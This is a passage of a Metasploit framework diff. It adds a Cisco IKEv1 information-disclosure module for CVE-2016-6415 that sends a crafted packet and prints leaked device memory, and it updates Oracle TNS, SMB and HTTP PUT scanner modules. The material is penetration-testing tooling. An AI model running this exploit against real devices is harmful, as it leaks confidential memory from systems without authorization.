|
||||
)
|
||||
else
|
||||
print_error("File doesn't seem to exist. The upload probably failed.")
|
||||
print_error("#{ip}: File doesn't seem to exist. The upload probably failed.")
|
||||
end
|
||||
|
||||
when 'DELETE'
|
||||
|
@ -160,18 +160,18 @@ class MetasploitModule < Msf::Auxiliary
|
|||
if path !~ /(.+\.\w+)$/
|
||||
print_error("You must supply a filename")
|
||||
return
|
||||
elsif not file_exists(path, data)
|
||||
elsif not file_exists(path, data, ip)
|
||||
print_error("File is already gone. Will not continue DELETE")
|
||||
return
|
||||
end
|
||||
|
||||
# Delete our file
|
||||
res = do_delete(path)
|
||||
vprint_status("Reply: #{res.code.to_s}") if not res.nil?
|
||||
res = do_delete(path, ip)
|
||||
vprint_status("#{ip}: Reply: #{res.code.to_s}") if not res.nil?
|
||||
|
||||
# Check if DELETE was successful
|
||||
if res.nil? or file_exists(path, data)
|
||||
print_error("DELETE failed. File is still there.")
|
||||
if res.nil? or file_exists(path, data, ip)
|
||||
print_error("#{ip}: DELETE failed. File is still there.")
|
||||
else
|
||||
turl = "#{(ssl ? 'https' : 'http')}://#{ip}:#{rport}#{path}"
|
||||
print_good("File deleted: #{turl}")
|
||||
|
|
|
@ -0,0 +1,100 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
|
||||
include Msf::Auxiliary::Scanner
|
||||
include Msf::Auxiliary::Report
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Cisco IKE Information Disclosure',
|
||||
'Description' => %q{
|
||||
A vulnerability in Internet Key Exchange version 1 (IKEv1) packet
|
||||
processing code in Cisco IOS, Cisco IOS XE, and Cisco IOS XR Software
|
||||
could allow an unauthenticated, remote attacker to retrieve memory
|
||||
contents, which could lead to the disclosure of confidential information.
|
||||
|
||||
The vulnerability is due to insufficient condition checks in the part
|
||||
of the code that handles IKEv1 security negotiation requests.
|
||||
An attacker could exploit this vulnerability by sending a crafted IKEv1
|
||||
packet to an affected device configured to accept IKEv1 security
|
||||
negotiation requests. A successful exploit could allow the attacker
|
||||
to retrieve memory contents, which could lead to the disclosure of
|
||||
confidential information.
|
||||
},
|
||||
'Author' => [ 'Nixawk' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2016-6415' ],
|
||||
[ 'URL', 'https://github.com/adamcaudill/EquationGroupLeak/tree/master/Firewall/TOOLS/BenignCertain/benigncertain-v1110' ],
|
||||
[ 'URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160916-ikev1' ],
|
||||
[ 'URL', 'https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-6415' ],
|
||||
[ 'URL', 'https://musalbas.com/2016/08/18/equation-group-benigncertain.html' ]
|
||||
],
|
||||
'DisclosureDate' => 'Sep 29 2016'
|
||||
))
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(500),
|
||||
OptPath.new('PACKETFILE',
|
||||
[ true, 'The ISAKMP packet file', File.join(Msf::Config.data_directory, 'exploits', 'cve-2016-6415', 'sendpacket.raw') ])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def run_host(ip)
|
||||
begin
|
||||
isakmp_pkt = File.read(datastore['PACKETFILE'])
|
||||
peer = "#{ip}:#{datastore['RPORT']}"
|
||||
|
||||
udp_sock = Rex::Socket::Udp.create(
|
||||
{
|
||||
'Context' => { 'Msf' => framework, 'MsfExploit' => self }
|
||||
}
|
||||
)
|
||||
|
||||
add_socket(udp_sock)
|
||||
|
||||
udp_sock.sendto(isakmp_pkt, ip, datastore['RPORT'].to_i)
|
||||
res = udp_sock.get(3)
|
||||
return unless res && res.length > 36 # ISAKMP + 36 -> Notitication Data...
|
||||
|
||||
# Convert non-printable characters to periods
|
||||
printable_data = res.gsub(/[^[:print:]]/, '.')
|
||||
|
||||
# Show abbreviated data
|
||||
vprint_status("Printable info leaked:\n#{printable_data}")
|
||||
|
||||
chars = res.unpack('C*')
|
||||
len = (chars[30].to_s(16) + chars[31].to_s(16)).hex
|
||||
|
||||
return if len <= 0
|
||||
print_good("#{peer} - IKE response with leak")
|
||||
report_vuln({
|
||||
:host => ip,
|
||||
:port => datastore['RPORT'],
|
||||
:proto => 'udp',
|
||||
:name => self.name,
|
||||
:refs => self.references,
|
||||
:info => "Vulnerable to Cisco IKE Information Disclosure"
|
||||
})
|
||||
|
||||
# NETWORK may return the same packet data.
|
||||
return if res.length < 2500
|
||||
pkt_md5 = ::Rex::Text.md5(isakmp_pkt[isakmp_pkt.length-2500, isakmp_pkt.length])
|
||||
res_md5 = ::Rex::Text.md5(res[res.length-2500, res.length])
|
||||
|
||||
print_warning("#{peer} - IKE response is same to payload data") if pkt_md5 == res_md5
|
||||
rescue
|
||||
ensure
|
||||
udp_sock.close
|
||||
end
|
||||
end
|
||||
|
||||
end
|
|
@ -42,8 +42,22 @@ class MetasploitModule < Msf::Auxiliary
|
|||
send_packet = tns_packet("(CONNECT_DATA=(COMMAND=service_register_NSGR))")
|
||||
sock.put(send_packet)
|
||||
packet = sock.read(100)
|
||||
if packet
|
||||
hex_packet = Rex::Text.to_hex(packet, ':')
|
||||
split_hex = hex_packet.split(':')
|
||||
find_packet = /\(ERROR_STACK=\(ERROR=/ === packet
|
||||
find_packet == true ? print_error("#{ip}:#{rport} is not vulnerable ") : print_good("#{ip}:#{rport} is vulnerable")
|
||||
if find_packet == true #TNS Packet returned ERROR
|
||||
print_error("#{ip}:#{rport} is not vulnerable")
|
||||
elsif split_hex[5] == '02' #TNS Packet Type: ACCEPT
|
||||
print_good("#{ip}:#{rport} is vulnerable")
|
||||
elsif split_hex[5] == '04' #TNS Packet Type: REFUSE
|
||||
print_error("#{ip}:#{rport} is not vulnerable")
|
||||
else #All other TNS packet types or non-TNS packet type response cannot guarantee vulnerability
|
||||
print_error("#{ip}:#{rport} might not be vulnerable")
|
||||
end
|
||||
else
|
||||
print_error("#{ip}:#{rport} is not vulnerable")
|
||||
end
|
||||
# TODO: Module should report_vuln if this finding is solid.
|
||||
rescue ::Rex::ConnectionError, ::Errno::EPIPE
|
||||
print_error("#{ip}:#{rport} unable to connect to the server")
|
||||
|
|
|
@ -108,7 +108,23 @@ class MetasploitModule < Msf::Auxiliary
|
|||
end
|
||||
|
||||
if simple.client.default_domain
|
||||
if simple.client.default_domain.encoding.name == "UTF-8"
|
||||
desc << " (domain:#{simple.client.default_domain})"
|
||||
else
|
||||
# Workgroup names are in ANSI, but may contain invalid characters
|
||||
# Go through each char and convert/check
|
||||
temp_workgroup = simple.client.default_domain.dup
|
||||
desc << " (workgroup:"
|
||||
temp_workgroup.each_char do |i|
|
||||
begin
|
||||
desc << i.encode("UTF-8")
|
||||
rescue Encoding::UndefinedConversionError => e
|
||||
desc << '?'
|
||||
print_error("Found incompatible (non-ANSI) character in Workgroup name. Replaced with '?'")
|
||||
end
|
||||
end
|
||||
desc << " )"
|
||||
end
|
||||
conf[:SMBDomain] = simple.client.default_domain
|
||||
match_conf['host.domain'] = conf[:SMBDomain]
|
||||
end
|
||||
|
|
Some files were not shown because too many files have changed in this diff Show More
Loading…
Reference in New Issue